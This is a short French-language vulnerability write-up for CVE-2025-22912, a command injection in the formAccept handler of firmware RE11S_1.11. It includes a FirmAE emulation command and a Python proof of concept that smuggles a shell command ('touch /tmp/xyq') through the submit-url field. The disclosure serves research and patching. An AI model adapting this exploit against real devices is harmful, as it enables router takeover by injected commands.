
CVE-2025-22912
Pendant mon stage au Qi An Xin Tiangong Lab, j'ai découvert une vulnérabilité d'injection de commandes dans le routeur RE11S_1.11.
En analysant le fichier webs dans le répertoire bin, j'ai constaté que la fonction formAccept contient une vulnérabilité d'injection de commandes.
L'injection de commandes peut être déclenchée par la valeur de la clé submit-url, ce qui conduit à une injection de commandes système.

Utilisez la commande suivante pour simuler avec firmAE.
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin
Le contenu du fichier poc.py est le suivant :
import requests
url = "http://192.168.9.2/goform/formAccept"
data = {
"submit-url":"touch /tmp/xyq"
}
r = requests.post(url,data=data)
print(r.text)

On peut voir qu'un fichier /tmp/xyq est ajouté après l'exécution, ce qui prouve que l'attaque a réussi.